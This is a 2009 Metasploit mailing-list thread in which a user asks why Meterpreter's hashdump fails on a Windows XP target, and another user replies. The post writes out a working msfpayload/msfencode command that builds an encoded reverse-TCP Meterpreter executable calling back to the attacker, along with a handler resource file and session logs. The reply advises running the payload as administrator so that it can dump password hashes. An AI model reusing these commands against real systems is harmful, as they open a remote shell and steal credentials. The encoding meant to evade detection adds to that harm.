Metasploit mailing list archives

Problem with meterpreter, priv, hashdump, etc.

From: wullie19 at ntlworld.com (rogue)
Date: Sat, 18 Apr 2009 22:00:27 +0100

Hi there,

I know you said you started msfconsole as root but to dump the hashes the 
meterpreter has to be running with the appropriate privileges. Try right 
clicking it and run as administrator and see if that helps.

-rogue

Hi all,

I have used msfpayload to create a .exe to connect back to me successfully
in the past, and find it to be a great tool.  However, today I seem to be
hitting the wall when I try to get a hashdump out of the remote system. 
Here's the scenario:

I should add, this is all done with a fresh local copy from the subversion
trunk, revision 6490, and with ~/.msf3 removed entirely and refreshed by a
new call to msfconsole before starting.

I created an executable with the following command:


./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R |
./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe

I started msfconsole (as root) with an rc file:


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
exploit

My session started just fine:


resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST x.x.x.x
LHOST => x.x.x.x
resource> set LPORT 443
LPORT => 443
resource> exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

On the remote system, I started the rv_443.exe and saw the connection back
to my msfconsole session:


[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:1210)

And, I was able to get info back from the remote system, as expected.


meterpreter > sysinfo
Computer: sanitized for the clients protection!
OS      : Windows XP (Build 2600, Service Pack 3).
meterpreter > ls

Listing: C:\DOKUME~1\someuser\LOKALE~1\Temp\FFC0EAB.tmp
=====================================================

Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Wed Dec 31 19:00:00 -0500 1969  .
40777/rwxrwxrwx   0        dir   Wed Dec 31 19:00:00 -0500 1969  ..
etc.
etc.
etc.

However, when I tried to use priv and then execute hashdump, or any other
command thereafter, I got errors.  I got no errors with 'ls' just after
'use priv', but I did get errors with 'ls' after 'hashdump'.


meterpreter > hashdump
[-] Error running command hashdump: wrong number of arguments (0 for 1)
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packe
t_dispatcher.rb:72:in
`initialize'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meter
preter/packet_dispatcher.rb:72:in
`exception'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterp
reter/packet_dispatcher.rb:72:in
`raise'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterprete
r/packet_dispatcher.rb:72:in
`send_request'/home/wdawson/Software/metasploit/framework3/lib/rex/post/met
erpreter/extensions/priv/priv.rb:44:in
`sam_hashes'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meter
preter/ui/console/command_dispatcher/priv/passwd.rb:39:in
`cmd_hashdump'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/
dispatcher_shell.rb:234:in
`send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch
er_shell.rb:234:in
`run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/post/mete
rpreter/ui/console.rb:94:in
`run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/d
ispatcher_shell.rb:196:in
`run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/di
spatcher_shell.rb:191:in
`each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch
er_shell.rb:191:in
`run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meter
preter/ui/console.rb:60:in
`interact'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shel
l.rb:123:in
`call'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb
:123:in
`run'/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/
ui/console.rb:58:in
`interact'/home/wdawson/Software/metasploit/framework3/lib/msf/base/session
s/meterpreter.rb:181:in
`_interact'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/interact
ive.rb:48:in
`interact'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/c
ommand_dispatcher/core.rb:997:in
`cmd_sessions'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/
dispatcher_shell.rb:234:in
`send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch
er_shell.rb:234:in
`run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/d
ispatcher_shell.rb:196:in
`run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/di
spatcher_shell.rb:191:in
`each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch
er_shell.rb:191:in
`run_single'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console
/command_dispatcher/exploit.rb:143:in
`cmd_exploit'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/d
ispatcher_shell.rb:234:in
`send'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch
er_shell.rb:234:in
`run_command'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/d
ispatcher_shell.rb:196:in
`run_single'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/di
spatcher_shell.rb:191:in
`each'/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatch
er_shell.rb:191:in
`run_single'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console
/driver.rb:190:in
`load_resource'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/cons
ole/driver.rb:185:in
`each_line'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/
driver.rb:185:in
`load_resource'/home/wdawson/Software/metasploit/framework3/lib/msf/ui/cons
ole/driver.rb:103:in `initialize'./msfconsole:82:in `new'./msfconsole:82

Would this be at all due to the fact that the remote system is (seemingly)
using a German locale, or is it due to some other factor?

Thanks in advance for any suggestions or insight.

Current thread:

problem Payload options (php/reverse_php) robert (Apr 18)
- problem Payload options (php/reverse_php) Enrico (Apr 18)
  - Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
    - Problem with meterpreter, priv, hashdump, etc. rogue (Apr 18)
    - Problem with meterpreter, priv, hashdump, etc. wfdawson at bellsouth.net (Apr 18)
- problem Payload options (php/reverse_php) Edward Bjarte Fjellskål (Apr 18)